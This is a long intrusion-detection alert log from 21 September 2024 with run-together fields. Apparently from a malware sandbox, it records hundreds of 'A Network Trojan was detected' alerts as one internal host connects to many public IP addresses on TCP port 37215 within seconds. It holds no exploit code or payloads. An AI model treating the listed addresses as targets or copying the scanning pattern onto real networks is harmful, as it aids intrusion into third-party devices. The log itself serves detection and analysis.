                  2024-09-21T15:21:16.429250+020028352221A Network Trojan was detected192.168.2.1457462157.95.193.1837215TCP
                  2024-09-21T15:21:16.429251+020028352221A Network Trojan was detected192.168.2.1459408153.252.243.4037215TCP
                  2024-09-21T15:21:16.429261+020028352221A Network Trojan was detected192.168.2.1458200197.54.202.14037215TCP
                  2024-09-21T15:21:16.429268+020028352221A Network Trojan was detected192.168.2.1436020157.15.131.537215TCP
                  2024-09-21T15:21:16.429279+020028352221A Network Trojan was detected192.168.2.1456264157.55.196.14237215TCP
                  2024-09-21T15:21:16.429296+020028352221A Network Trojan was detected192.168.2.1449924197.207.230.13037215TCP
                  2024-09-21T15:21:16.429296+020028352221A Network Trojan was detected192.168.2.1437270157.150.141.737215TCP
                  2024-09-21T15:21:16.429299+020028352221A Network Trojan was detected192.168.2.1451500113.44.184.6537215TCP
                  2024-09-21T15:21:16.429305+020028352221A Network Trojan was detected192.168.2.1444208197.219.160.19537215TCP
                  2024-09-21T15:21:16.429318+020028352221A Network Trojan was detected192.168.2.144489841.83.220.18037215TCP
                  2024-09-21T15:21:16.429334+020028352221A Network Trojan was detected192.168.2.144762641.32.63.17837215TCP
                  2024-09-21T15:21:16.429335+020028352221A Network Trojan was detected192.168.2.1434526197.217.169.1037215TCP
                  2024-09-21T15:21:16.429335+020028352221A Network Trojan was detected192.168.2.1439674157.84.216.17337215TCP
                  2024-09-21T15:21:16.429346+020028352221A Network Trojan was detected192.168.2.144097041.128.224.14237215TCP
                  2024-09-21T15:21:16.429354+020028352221A Network Trojan was detected192.168.2.1459108157.97.206.7137215TCP
                  2024-09-21T15:21:16.429354+020028352221A Network Trojan was detected192.168.2.1450996197.75.214.5237215TCP
                  2024-09-21T15:21:16.429807+020028352221A Network Trojan was detected192.168.2.1455052157.156.181.437215TCP
                  2024-09-21T15:21:17.250353+020028352221A Network Trojan was detected192.168.2.1452584197.16.79.6337215TCP
                  2024-09-21T15:21:17.265128+020028352221A Network Trojan was detected192.168.2.144092241.222.31.11437215TCP
                  2024-09-21T15:21:17.265759+020028352221A Network Trojan was detected192.168.2.1433764162.140.19.10037215TCP
                  2024-09-21T15:21:17.265832+020028352221A Network Trojan was detected192.168.2.1447048164.255.14.9037215TCP
                  2024-09-21T15:21:17.266891+020028352221A Network Trojan was detected192.168.2.1454588197.35.54.4437215TCP
                  2024-09-21T15:21:17.269223+020028352221A Network Trojan was detected192.168.2.1433184157.2.141.16737215TCP
                  2024-09-21T15:21:17.270759+020028352221A Network Trojan was detected192.168.2.143766041.132.251.17737215TCP
                  2024-09-21T15:21:17.280783+020028352221A Network Trojan was detected192.168.2.1435356197.41.219.5637215TCP
                  2024-09-21T15:21:17.282419+020028352221A Network Trojan was detected192.168.2.1455964157.28.128.9237215TCP
                  2024-09-21T15:21:17.298162+020028352221A Network Trojan was detected192.168.2.1450288157.45.7.11937215TCP
                  2024-09-21T15:21:17.298215+020028352221A Network Trojan was detected192.168.2.145476894.124.28.14237215TCP
                  2024-09-21T15:21:17.300244+020028352221A Network Trojan was detected192.168.2.1434290157.64.101.6937215TCP
                  2024-09-21T15:21:17.300654+020028352221A Network Trojan was detected192.168.2.1444660157.190.16.20537215TCP
                  2024-09-21T15:21:17.313196+020028352221A Network Trojan was detected192.168.2.1453784157.254.35.2037215TCP
                  2024-09-21T15:21:17.390204+020028352221A Network Trojan was detected192.168.2.1439546166.78.247.24937215TCP
                  2024-09-21T15:21:17.390268+020028352221A Network Trojan was detected192.168.2.145036841.140.91.10137215TCP
                  2024-09-21T15:21:17.405737+020028352221A Network Trojan was detected192.168.2.143718244.60.254.15137215TCP
                  2024-09-21T15:21:17.409524+020028352221A Network Trojan was detected192.168.2.145481441.62.45.24437215TCP
                  2024-09-21T15:21:17.421074+020028352221A Network Trojan was detected192.168.2.1440866157.88.180.8337215TCP
                  2024-09-21T15:21:17.421619+020028352221A Network Trojan was detected192.168.2.1440552157.169.74.3737215TCP
                  2024-09-21T15:21:19.097735+020028352221A Network Trojan was detected192.168.2.1459458197.175.69.12037215TCP
                  2024-09-21T15:21:19.141892+020028352221A Network Trojan was detected192.168.2.1453050157.84.210.4837215TCP
                  2024-09-21T15:21:19.156692+020028352221A Network Trojan was detected192.168.2.145802441.57.113.9637215TCP
                  2024-09-21T15:21:19.173084+020028352221A Network Trojan was detected192.168.2.145842641.1.21.19137215TCP
                  2024-09-21T15:21:19.188993+020028352221A Network Trojan was detected192.168.2.1459700197.187.66.1437215TCP
                  2024-09-21T15:21:19.202669+020028352221A Network Trojan was detected192.168.2.145315841.225.75.16337215TCP
                  2024-09-21T15:21:19.204585+020028352221A Network Trojan was detected192.168.2.1449220197.225.175.25237215TCP
                  2024-09-21T15:21:19.206611+020028352221A Network Trojan was detected192.168.2.1455372197.175.90.18037215TCP
                  2024-09-21T15:21:19.249654+020028352221A Network Trojan was detected192.168.2.1433960197.222.117.22637215TCP
                  2024-09-21T15:21:19.251154+020028352221A Network Trojan was detected192.168.2.1436346157.136.152.3237215TCP
                  2024-09-21T15:21:19.251245+020028352221A Network Trojan was detected192.168.2.144943041.231.37.23837215TCP
                  2024-09-21T15:21:19.253302+020028352221A Network Trojan was detected192.168.2.1455396199.107.14.6037215TCP
                  2024-09-21T15:21:19.280966+020028352221A Network Trojan was detected192.168.2.14486181.58.90.4337215TCP
                  2024-09-21T15:21:19.282630+020028352221A Network Trojan was detected192.168.2.1443486157.19.234.3737215TCP
                  2024-09-21T15:21:19.296603+020028352221A Network Trojan was detected192.168.2.1450270157.55.140.7437215TCP
                  2024-09-21T15:21:19.297159+020028352221A Network Trojan was detected192.168.2.1456270157.44.54.4937215TCP
                  2024-09-21T15:21:19.523569+020028352221A Network Trojan was detected192.168.2.1439840197.129.199.17437215TCP
                  2024-09-21T15:21:20.157536+020028352221A Network Trojan was detected192.168.2.1441956157.195.231.21837215TCP
                  2024-09-21T15:21:20.300362+020028352221A Network Trojan was detected192.168.2.1433474176.99.99.15337215TCP
                  2024-09-21T15:21:20.302659+020028352221A Network Trojan was detected192.168.2.1453492157.103.22.21937215TCP
                  2024-09-21T15:21:20.374983+020028352221A Network Trojan was detected192.168.2.1458760157.127.133.2737215TCP
                  2024-09-21T15:21:20.406945+020028352221A Network Trojan was detected192.168.2.1448472197.57.203.21137215TCP
                  2024-09-21T15:21:20.420949+020028352221A Network Trojan was detected192.168.2.145173817.150.66.3637215TCP
                  2024-09-21T15:21:20.421445+020028352221A Network Trojan was detected192.168.2.1439644157.34.229.1137215TCP
                  2024-09-21T15:21:20.421964+020028352221A Network Trojan was detected192.168.2.1434752157.201.72.16737215TCP
                  2024-09-21T15:21:20.425396+020028352221A Network Trojan was detected192.168.2.1456798197.23.201.18537215TCP
                  2024-09-21T15:21:20.440859+020028352221A Network Trojan was detected192.168.2.143490641.242.160.20537215TCP
                  2024-09-21T15:21:20.440892+020028352221A Network Trojan was detected192.168.2.145881241.233.5.6837215TCP
                  2024-09-21T15:21:20.484063+020028352221A Network Trojan was detected192.168.2.14424442.31.239.25037215TCP
                  2024-09-21T15:21:20.501331+020028352221A Network Trojan was detected192.168.2.1437880157.88.173.3937215TCP
                  2024-09-21T15:21:20.501333+020028352221A Network Trojan was detected192.168.2.146008841.45.0.22337215TCP
                  2024-09-21T15:21:20.506637+020028352221A Network Trojan was detected192.168.2.1445560197.23.252.19537215TCP
                  2024-09-21T15:21:20.518439+020028352221A Network Trojan was detected192.168.2.1444082178.252.128.7537215TCP
                  2024-09-21T15:21:20.518441+020028352221A Network Trojan was detected192.168.2.1436082157.37.31.5937215TCP
                  2024-09-21T15:21:20.520938+020028352221A Network Trojan was detected192.168.2.1456834180.105.253.18037215TCP
                  2024-09-21T15:21:20.520947+020028352221A Network Trojan was detected192.168.2.1458058157.69.214.3337215TCP
                  2024-09-21T15:21:20.578312+020028352221A Network Trojan was detected192.168.2.1456584197.182.31.15237215TCP
                  2024-09-21T15:21:20.593486+020028352221A Network Trojan was detected192.168.2.144577441.57.176.17837215TCP
                  2024-09-21T15:21:20.593561+020028352221A Network Trojan was detected192.168.2.1452480197.142.0.5537215TCP
                  2024-09-21T15:21:20.594008+020028352221A Network Trojan was detected192.168.2.1460850157.175.28.24837215TCP
                  2024-09-21T15:21:20.597498+020028352221A Network Trojan was detected192.168.2.1451636157.111.20.24037215TCP
                  2024-09-21T15:21:21.328273+020028352221A Network Trojan was detected192.168.2.1447476197.197.206.13337215TCP
                  2024-09-21T15:21:21.364656+020028352221A Network Trojan was detected192.168.2.145912437.52.251.9537215TCP
                  2024-09-21T15:21:21.374979+020028352221A Network Trojan was detected192.168.2.1440242197.59.216.13637215TCP
                  2024-09-21T15:21:21.375255+020028352221A Network Trojan was detected192.168.2.1436690197.113.243.19037215TCP
                  2024-09-21T15:21:21.376579+020028352221A Network Trojan was detected192.168.2.1458080157.23.225.3137215TCP
                  2024-09-21T15:21:21.391288+020028352221A Network Trojan was detected192.168.2.1442328157.165.238.18937215TCP
                  2024-09-21T15:21:21.407706+020028352221A Network Trojan was detected192.168.2.146091441.251.158.16837215TCP
                  2024-09-21T15:21:21.421566+020028352221A Network Trojan was detected192.168.2.143341841.135.116.15037215TCP
                  2024-09-21T15:21:21.421818+020028352221A Network Trojan was detected192.168.2.146015241.91.145.13437215TCP
                  2024-09-21T15:21:21.425299+020028352221A Network Trojan was detected192.168.2.1435742157.191.46.19437215TCP
                  2024-09-21T15:21:21.427312+020028352221A Network Trojan was detected192.168.2.143354241.219.75.10237215TCP
                  2024-09-21T15:21:21.469212+020028352221A Network Trojan was detected192.168.2.144096841.188.65.4737215TCP
                  2024-09-21T15:21:21.487813+020028352221A Network Trojan was detected192.168.2.1448180197.241.112.15537215TCP
                  2024-09-21T15:21:21.487871+020028352221A Network Trojan was detected192.168.2.1435822197.30.26.22937215TCP
                  2024-09-21T15:21:21.487955+020028352221A Network Trojan was detected192.168.2.1433588201.38.238.10337215TCP
                  2024-09-21T15:21:21.488037+020028352221A Network Trojan was detected192.168.2.145325451.196.229.3537215TCP
                  2024-09-21T15:21:22.155981+020028352221A Network Trojan was detected192.168.2.145269854.221.26.24837215TCP
                  2024-09-21T15:21:22.157765+020028352221A Network Trojan was detected192.168.2.1456846197.195.16.15737215TCP
                  2024-09-21T15:21:23.227993+020028352221A Network Trojan was detected192.168.2.145474860.169.19.8137215TCP
                  2024-09-21T15:21:23.229325+020028352221A Network Trojan was detected192.168.2.143802641.67.147.3137215TCP
                  2024-09-21T15:21:23.229531+020028352221A Network Trojan was detected192.168.2.1459444157.95.248.17437215TCP
                  2024-09-21T15:21:23.229543+020028352221A Network Trojan was detected192.168.2.143903441.135.7.837215TCP
                  2024-09-21T15:21:23.229558+020028352221A Network Trojan was detected192.168.2.145737841.199.224.22037215TCP
                  2024-09-21T15:21:23.229631+020028352221A Network Trojan was detected192.168.2.1442806164.250.160.6437215TCP
                  2024-09-21T15:21:23.229710+020028352221A Network Trojan was detected192.168.2.1433114197.229.79.7337215TCP
                  2024-09-21T15:21:23.229744+020028352221A Network Trojan was detected192.168.2.1452468157.28.201.17537215TCP
                  2024-09-21T15:21:23.229982+020028352221A Network Trojan was detected192.168.2.1446310169.54.46.6337215TCP
                  2024-09-21T15:21:23.230036+020028352221A Network Trojan was detected192.168.2.143300841.155.108.5737215TCP
                  2024-09-21T15:21:23.230136+020028352221A Network Trojan was detected192.168.2.1451522166.75.152.23137215TCP
                  2024-09-21T15:21:23.230260+020028352221A Network Trojan was detected192.168.2.1436958157.97.152.10537215TCP
                  2024-09-21T15:21:23.230519+020028352221A Network Trojan was detected192.168.2.145213841.58.251.24037215TCP
                  2024-09-21T15:21:23.230677+020028352221A Network Trojan was detected192.168.2.1460310143.41.171.24737215TCP
                  2024-09-21T15:21:23.230744+020028352221A Network Trojan was detected192.168.2.1447702197.133.70.24137215TCP
                  2024-09-21T15:21:23.230795+020028352221A Network Trojan was detected192.168.2.143849241.63.235.3937215TCP
                  2024-09-21T15:21:23.230819+020028352221A Network Trojan was detected192.168.2.1435042197.120.11.337215TCP
                  2024-09-21T15:21:23.254552+020028352221A Network Trojan was detected192.168.2.1443808137.240.25.637215TCP
                  2024-09-21T15:21:23.254565+020028352221A Network Trojan was detected192.168.2.1434260197.129.251.16137215TCP
                  2024-09-21T15:21:23.254626+020028352221A Network Trojan was detected192.168.2.1442702157.113.151.18437215TCP
                  2024-09-21T15:21:23.437214+020028352221A Network Trojan was detected192.168.2.1451390138.89.176.4537215TCP
                  2024-09-21T15:21:23.438030+020028352221A Network Trojan was detected192.168.2.1440486197.186.209.10337215TCP
                  2024-09-21T15:21:23.438793+020028352221A Network Trojan was detected192.168.2.144328048.239.227.10737215TCP
                  2024-09-21T15:21:23.438896+020028352221A Network Trojan was detected192.168.2.1451030210.186.123.11937215TCP
                  2024-09-21T15:21:23.624858+020028352221A Network Trojan was detected192.168.2.1451542116.102.209.8637215TCP
                  2024-09-21T15:21:23.640417+020028352221A Network Trojan was detected192.168.2.145515665.26.131.2037215TCP
                  2024-09-21T15:21:23.655418+020028352221A Network Trojan was detected192.168.2.1436108176.145.137.10737215TCP
                  2024-09-21T15:21:23.656526+020028352221A Network Trojan was detected192.168.2.1460306206.205.145.22337215TCP
                  2024-09-21T15:21:24.038128+020028352221A Network Trojan was detected192.168.2.1448704157.227.91.18137215TCP
                  2024-09-21T15:21:24.038129+020028352221A Network Trojan was detected192.168.2.1433032107.151.87.12237215TCP
                  2024-09-21T15:21:24.038140+020028352221A Network Trojan was detected192.168.2.1455092223.31.34.12737215TCP
                  2024-09-21T15:21:24.038142+020028352221A Network Trojan was detected192.168.2.1441390157.90.128.19337215TCP
                  2024-09-21T15:21:24.038152+020028352221A Network Trojan was detected192.168.2.143392672.74.84.4137215TCP
                  2024-09-21T15:21:25.050179+020028352221A Network Trojan was detected192.168.2.143399283.139.6.7837215TCP
                  2024-09-21T15:21:25.376542+020028352221A Network Trojan was detected192.168.2.146002041.198.131.5737215TCP
                  2024-09-21T15:21:25.687250+020028352221A Network Trojan was detected192.168.2.145173841.19.182.6037215TCP
                  2024-09-21T15:21:25.703041+020028352221A Network Trojan was detected192.168.2.145940041.225.246.21837215TCP
                  2024-09-21T15:21:25.706693+020028352221A Network Trojan was detected192.168.2.1454180197.84.40.837215TCP
                  2024-09-21T15:21:25.749759+020028352221A Network Trojan was detected192.168.2.1441016197.162.92.20037215TCP
                  2024-09-21T15:21:25.765502+020028352221A Network Trojan was detected192.168.2.143838041.75.255.6737215TCP
                  2024-09-21T15:21:25.782396+020028352221A Network Trojan was detected192.168.2.1447874157.123.246.22137215TCP
                  2024-09-21T15:21:25.782724+020028352221A Network Trojan was detected192.168.2.1434960157.207.4.23837215TCP
                  2024-09-21T15:21:25.786549+020028352221A Network Trojan was detected192.168.2.145759841.187.170.9837215TCP
                  2024-09-21T15:21:25.859409+020028352221A Network Trojan was detected192.168.2.143790644.94.20.22037215TCP
                  2024-09-21T15:21:25.882474+020028352221A Network Trojan was detected192.168.2.1443802154.16.84.5037215TCP
                  2024-09-21T15:21:25.892234+020028352221A Network Trojan was detected192.168.2.145282463.169.86.8737215TCP
                  2024-09-21T15:21:25.910444+020028352221A Network Trojan was detected192.168.2.1450782197.52.77.5637215TCP
                  2024-09-21T15:21:25.925811+020028352221A Network Trojan was detected192.168.2.1454878197.16.233.14237215TCP
                  2024-09-21T15:21:25.937282+020028352221A Network Trojan was detected192.168.2.1439174196.209.10.3037215TCP
                  2024-09-21T15:21:25.939014+020028352221A Network Trojan was detected192.168.2.1442442197.101.97.18937215TCP
                  2024-09-21T15:21:25.952854+020028352221A Network Trojan was detected192.168.2.1436424197.64.151.14737215TCP
                  2024-09-21T15:21:25.954507+020028352221A Network Trojan was detected192.168.2.1457574118.126.42.3337215TCP
                  2024-09-21T15:21:25.954533+020028352221A Network Trojan was detected192.168.2.143458237.136.57.6437215TCP
                  2024-09-21T15:21:25.958541+020028352221A Network Trojan was detected192.168.2.1453090157.71.23.10537215TCP
                  2024-09-21T15:21:25.958575+020028352221A Network Trojan was detected192.168.2.143442641.115.189.6637215TCP
                  2024-09-21T15:21:25.970262+020028352221A Network Trojan was detected192.168.2.1447870194.21.67.11237215TCP
                  2024-09-21T15:21:25.984348+020028352221A Network Trojan was detected192.168.2.1433262197.29.91.5037215TCP
                  2024-09-21T15:21:26.031821+020028352221A Network Trojan was detected192.168.2.144384241.7.193.19737215TCP
                  2024-09-21T15:21:26.062464+020028352221A Network Trojan was detected192.168.2.1452876100.176.184.23237215TCP
                  2024-09-21T15:21:26.066241+020028352221A Network Trojan was detected192.168.2.144340641.233.30.6837215TCP
                  2024-09-21T15:21:26.841885+020028352221A Network Trojan was detected192.168.2.144594441.55.183.24237215TCP
                  2024-09-21T15:21:26.841906+020028352221A Network Trojan was detected192.168.2.143677241.208.218.23237215TCP
                  2024-09-21T15:21:26.842109+020028352221A Network Trojan was detected192.168.2.1460316157.5.195.21537215TCP
                  2024-09-21T15:21:26.842137+020028352221A Network Trojan was detected192.168.2.144808841.12.240.9837215TCP
                  2024-09-21T15:21:26.880488+020028352221A Network Trojan was detected192.168.2.1445428197.130.209.4437215TCP
                  2024-09-21T15:21:26.908539+020028352221A Network Trojan was detected192.168.2.1443198184.68.240.4037215TCP
                  2024-09-21T15:21:26.956700+020028352221A Network Trojan was detected192.168.2.1442116157.96.37.5337215TCP
                  2024-09-21T15:21:26.999283+020028352221A Network Trojan was detected192.168.2.145945641.135.159.19837215TCP
                  2024-09-21T15:21:27.000277+020028352221A Network Trojan was detected192.168.2.144596241.199.26.7537215TCP
                  2024-09-21T15:21:27.002061+020028352221A Network Trojan was detected192.168.2.145741668.111.3.20037215TCP
                  2024-09-21T15:21:27.005229+020028352221A Network Trojan was detected192.168.2.1460920197.177.192.13437215TCP
                  2024-09-21T15:21:28.781074+020028352221A Network Trojan was detected192.168.2.144247461.171.253.14337215TCP
                  2024-09-21T15:21:29.001801+020028352221A Network Trojan was detected192.168.2.1451396142.187.241.1237215TCP
                  2024-09-21T15:21:29.019067+020028352221A Network Trojan was detected192.168.2.143567241.180.39.16237215TCP
                  2024-09-21T15:21:29.034751+020028352221A Network Trojan was detected192.168.2.1453648197.161.82.7237215TCP
                  2024-09-21T15:21:29.050876+020028352221A Network Trojan was detected192.168.2.144633831.66.8.3437215TCP
                  2024-09-21T15:21:29.050904+020028352221A Network Trojan was detected192.168.2.144349494.9.55.21637215TCP
                  2024-09-21T15:21:29.064362+020028352221A Network Trojan was detected192.168.2.1448426157.116.190.2637215TCP
                  2024-09-21T15:21:29.068001+020028352221A Network Trojan was detected192.168.2.145419241.187.6.22837215TCP
                  2024-09-21T15:21:29.081849+020028352221A Network Trojan was detected192.168.2.1458744180.245.93.9037215TCP
                  2024-09-21T15:21:29.083973+020028352221A Network Trojan was detected192.168.2.145427041.110.91.10037215TCP
                  2024-09-21T15:21:29.093495+020028352221A Network Trojan was detected192.168.2.144456641.213.176.22937215TCP
                  2024-09-21T15:21:29.093649+020028352221A Network Trojan was detected192.168.2.1446976157.153.140.13437215TCP
                  2024-09-21T15:21:29.097417+020028352221A Network Trojan was detected192.168.2.1449480197.40.167.24537215TCP
                  2024-09-21T15:21:29.112641+020028352221A Network Trojan was detected192.168.2.1434732181.98.90.13237215TCP
                  2024-09-21T15:21:29.113973+020028352221A Network Trojan was detected192.168.2.143725641.118.9.13337215TCP
                  2024-09-21T15:21:29.124802+020028352221A Network Trojan was detected192.168.2.1454880157.204.15.17837215TCP
                  2024-09-21T15:21:29.128660+020028352221A Network Trojan was detected192.168.2.1448684130.115.80.3037215TCP
                  2024-09-21T15:21:29.130370+020028352221A Network Trojan was detected192.168.2.1438252197.74.237.22137215TCP
                  2024-09-21T15:21:29.140404+020028352221A Network Trojan was detected192.168.2.145260241.236.243.19237215TCP
                  2024-09-21T15:21:29.144102+020028352221A Network Trojan was detected192.168.2.145984041.7.200.11337215TCP
                  2024-09-21T15:21:29.177495+020028352221A Network Trojan was detected192.168.2.145640641.21.68.25137215TCP
                  2024-09-21T15:21:29.177583+020028352221A Network Trojan was detected192.168.2.1446914157.134.124.22837215TCP
                  2024-09-21T15:21:29.208627+020028352221A Network Trojan was detected192.168.2.1457270157.162.122.2637215TCP
                  2024-09-21T15:21:29.602469+020028352221A Network Trojan was detected192.168.2.1433600197.5.109.16037215TCP
                  2024-09-21T15:21:30.095491+020028352221A Network Trojan was detected192.168.2.1446318103.41.35.9737215TCP
                  2024-09-21T15:21:30.110952+020028352221A Network Trojan was detected192.168.2.145641441.22.62.8037215TCP
                  2024-09-21T15:21:31.156949+020028352221A Network Trojan was detected192.168.2.144305441.240.18.6037215TCP
                  2024-09-21T15:21:32.052285+020028352221A Network Trojan was detected192.168.2.1438902157.27.97.23937215TCP
                  2024-09-21T15:21:32.064119+020028352221A Network Trojan was detected192.168.2.1439284157.54.107.22837215TCP
                  2024-09-21T15:21:32.109322+020028352221A Network Trojan was detected192.168.2.144035841.84.142.2737215TCP
                  2024-09-21T15:21:32.125564+020028352221A Network Trojan was detected192.168.2.1456098157.83.245.24937215TCP
                  2024-09-21T15:21:32.171776+020028352221A Network Trojan was detected192.168.2.1436248197.232.12.15937215TCP
                  2024-09-21T15:21:32.173426+020028352221A Network Trojan was detected192.168.2.143672641.192.66.21137215TCP
                  2024-09-21T15:21:32.175563+020028352221A Network Trojan was detected192.168.2.1434752197.144.104.9837215TCP
                  2024-09-21T15:21:32.463908+020028352221A Network Trojan was detected192.168.2.1445922197.28.192.17737215TCP
                  2024-09-21T15:21:32.873293+020028352221A Network Trojan was detected192.168.2.143723241.79.29.2937215TCP
                  2024-09-21T15:21:34.173647+020028352221A Network Trojan was detected192.168.2.1445562157.30.8.21237215TCP
                  2024-09-21T15:21:34.203703+020028352221A Network Trojan was detected192.168.2.1446382184.179.98.8437215TCP
                  2024-09-21T15:21:34.209000+020028352221A Network Trojan was detected192.168.2.1455418197.76.26.5137215TCP
                  2024-09-21T15:21:34.218781+020028352221A Network Trojan was detected192.168.2.1460442197.132.50.1537215TCP
                  2024-09-21T15:21:34.234983+020028352221A Network Trojan was detected192.168.2.144906236.46.72.2637215TCP
                  2024-09-21T15:21:34.251735+020028352221A Network Trojan was detected192.168.2.1457756157.171.244.7937215TCP
                  2024-09-21T15:21:34.251750+020028352221A Network Trojan was detected192.168.2.1454866197.239.104.19137215TCP
                  2024-09-21T15:21:34.251781+020028352221A Network Trojan was detected192.168.2.1457372197.247.64.12737215TCP
                  2024-09-21T15:21:34.265482+020028352221A Network Trojan was detected192.168.2.144151841.205.249.12037215TCP
                  2024-09-21T15:21:34.265505+020028352221A Network Trojan was detected192.168.2.1456914157.6.172.8737215TCP
                  2024-09-21T15:21:34.265510+020028352221A Network Trojan was detected192.168.2.143308641.85.140.4437215TCP
                  2024-09-21T15:21:34.314455+020028352221A Network Trojan was detected192.168.2.1449362197.164.239.3337215TCP
                  2024-09-21T15:21:34.328058+020028352221A Network Trojan was detected192.168.2.1451104157.92.99.5437215TCP
                  2024-09-21T15:21:34.328718+020028352221A Network Trojan was detected192.168.2.145489276.159.253.3637215TCP
                  2024-09-21T15:21:34.330845+020028352221A Network Trojan was detected192.168.2.144516892.75.233.25237215TCP
                  2024-09-21T15:21:34.331649+020028352221A Network Trojan was detected192.168.2.1440888157.118.109.17537215TCP
                  2024-09-21T15:21:34.348038+020028352221A Network Trojan was detected192.168.2.144047841.32.104.23237215TCP
                  2024-09-21T15:21:34.359357+020028352221A Network Trojan was detected192.168.2.1435574197.251.112.25137215TCP
                  2024-09-21T15:21:34.364740+020028352221A Network Trojan was detected192.168.2.145533023.228.19.18037215TCP
                  2024-09-21T15:21:34.376275+020028352221A Network Trojan was detected192.168.2.1441524157.218.11.17937215TCP
                  2024-09-21T15:21:34.378385+020028352221A Network Trojan was detected192.168.2.144147841.156.50.14237215TCP
                  2024-09-21T15:21:34.390491+020028352221A Network Trojan was detected192.168.2.1442102197.249.208.20037215TCP
                  2024-09-21T15:21:34.394420+020028352221A Network Trojan was detected192.168.2.1434854197.225.179.1937215TCP
                  2024-09-21T15:21:35.204113+020028352221A Network Trojan was detected192.168.2.1441544197.203.169.12837215TCP
                  2024-09-21T15:21:35.204117+020028352221A Network Trojan was detected192.168.2.144903041.84.180.4337215TCP
                  2024-09-21T15:21:35.204784+020028352221A Network Trojan was detected192.168.2.1448788202.167.202.11237215TCP
                  2024-09-21T15:21:35.207434+020028352221A Network Trojan was detected192.168.2.1448262157.208.141.14037215TCP
                  2024-09-21T15:21:35.207438+020028352221A Network Trojan was detected192.168.2.145542286.95.195.12937215TCP
                  2024-09-21T15:21:35.207455+020028352221A Network Trojan was detected192.168.2.1434600157.203.25.14137215TCP
                  2024-09-21T15:21:35.218914+020028352221A Network Trojan was detected192.168.2.1451230157.166.242.437215TCP
                  2024-09-21T15:21:35.222967+020028352221A Network Trojan was detected192.168.2.1443000157.221.242.19437215TCP
                  2024-09-21T15:21:35.249860+020028352221A Network Trojan was detected192.168.2.1435272197.152.182.8937215TCP
                  2024-09-21T15:21:35.251873+020028352221A Network Trojan was detected192.168.2.1458354157.134.48.23537215TCP
                  2024-09-21T15:21:35.254335+020028352221A Network Trojan was detected192.168.2.1454266151.236.4.2637215TCP
                  2024-09-21T15:21:35.265471+020028352221A Network Trojan was detected192.168.2.143573841.98.119.20337215TCP
                  2024-09-21T15:21:35.271359+020028352221A Network Trojan was detected192.168.2.1450918173.35.99.17937215TCP
                  2024-09-21T15:21:35.302605+020028352221A Network Trojan was detected192.168.2.1458892197.253.81.14037215TCP
                  2024-09-21T15:21:35.327848+020028352221A Network Trojan was detected192.168.2.1442470157.120.26.11437215TCP
                  2024-09-21T15:21:35.328468+020028352221A Network Trojan was detected192.168.2.1438514197.189.246.9037215TCP
                  2024-09-21T15:21:35.348003+020028352221A Network Trojan was detected192.168.2.144302484.117.8.7637215TCP
                  2024-09-21T15:21:35.349350+020028352221A Network Trojan was detected192.168.2.1453434157.202.64.16437215TCP
                  2024-09-21T15:21:35.359310+020028352221A Network Trojan was detected192.168.2.1447560205.76.172.23237215TCP
                  2024-09-21T15:21:35.361037+020028352221A Network Trojan was detected192.168.2.1440124197.227.178.7037215TCP
                  2024-09-21T15:21:35.364859+020028352221A Network Trojan was detected192.168.2.1452558157.197.238.19637215TCP
                  2024-09-21T15:21:35.374473+020028352221A Network Trojan was detected192.168.2.1437646157.218.244.20737215TCP
                  2024-09-21T15:21:35.390637+020028352221A Network Trojan was detected192.168.2.1440540197.139.27.16037215TCP
                  2024-09-21T15:21:35.422661+020028352221A Network Trojan was detected192.168.2.1446336179.12.50.24037215TCP
                  2024-09-21T15:21:35.437594+020028352221A Network Trojan was detected192.168.2.1436004157.148.209.18537215TCP
                  2024-09-21T15:21:35.438036+020028352221A Network Trojan was detected192.168.2.144524241.67.190.19837215TCP
                  2024-09-21T15:21:35.443147+020028352221A Network Trojan was detected192.168.2.145583241.24.137.13937215TCP
                  2024-09-21T15:21:35.499897+020028352221A Network Trojan was detected192.168.2.1447308119.14.227.25237215TCP
                  2024-09-21T15:21:35.515105+020028352221A Network Trojan was detected192.168.2.145192441.35.100.16937215TCP
                  2024-09-21T15:21:35.548647+020028352221A Network Trojan was detected192.168.2.1459214218.181.184.3737215TCP
                  2024-09-21T15:21:35.548786+020028352221A Network Trojan was detected192.168.2.143701841.238.20.13337215TCP
                  2024-09-21T15:21:35.562589+020028352221A Network Trojan was detected192.168.2.145035041.197.71.17137215TCP
                  2024-09-21T15:21:35.562647+020028352221A Network Trojan was detected192.168.2.1458760197.74.246.25337215TCP
                  2024-09-21T15:21:35.562658+020028352221A Network Trojan was detected192.168.2.143790641.195.228.8237215TCP
                  2024-09-21T15:21:35.562866+020028352221A Network Trojan was detected192.168.2.1443850157.230.129.4937215TCP
                  2024-09-21T15:21:35.562870+020028352221A Network Trojan was detected192.168.2.143958041.34.225.5937215TCP
                  2024-09-21T15:21:35.563098+020028352221A Network Trojan was detected192.168.2.1444278197.227.212.20237215TCP
                  2024-09-21T15:21:35.564076+020028352221A Network Trojan was detected192.168.2.144113649.50.30.7337215TCP
                  2024-09-21T15:21:35.566437+020028352221A Network Trojan was detected192.168.2.145329641.244.147.22637215TCP
                  2024-09-21T15:21:35.567960+020028352221A Network Trojan was detected192.168.2.1435160197.164.50.20737215TCP
                  2024-09-21T15:21:36.297646+020028352221A Network Trojan was detected192.168.2.1456572197.156.103.5837215TCP
                  2024-09-21T15:21:36.299113+020028352221A Network Trojan was detected192.168.2.1456888197.115.80.6637215TCP
                  2024-09-21T15:21:36.301467+020028352221A Network Trojan was detected192.168.2.143986267.24.30.5637215TCP
                  2024-09-21T15:21:36.302460+020028352221A Network Trojan was detected192.168.2.1444494197.106.234.4337215TCP
                  2024-09-21T15:21:36.312384+020028352221A Network Trojan was detected192.168.2.143446470.146.166.1037215TCP
                  2024-09-21T15:21:36.312394+020028352221A Network Trojan was detected192.168.2.1449246157.223.73.6837215TCP
                  2024-09-21T15:21:36.333656+020028352221A Network Trojan was detected192.168.2.145872041.8.12.17637215TCP
                  2024-09-21T15:21:36.359630+020028352221A Network Trojan was detected192.168.2.145293241.232.141.11437215TCP
                  2024-09-21T15:21:36.360837+020028352221A Network Trojan was detected192.168.2.144609441.5.111.6537215TCP
                  2024-09-21T15:21:36.362995+020028352221A Network Trojan was detected192.168.2.14447745.216.42.22137215TCP
                  2024-09-21T15:21:36.391319+020028352221A Network Trojan was detected192.168.2.1451880157.113.130.16737215TCP
                  2024-09-21T15:21:36.597535+020028352221A Network Trojan was detected192.168.2.1436612157.152.162.6137215TCP
                  2024-09-21T15:21:36.828713+020028352221A Network Trojan was detected192.168.2.144144880.184.34.25137215TCP
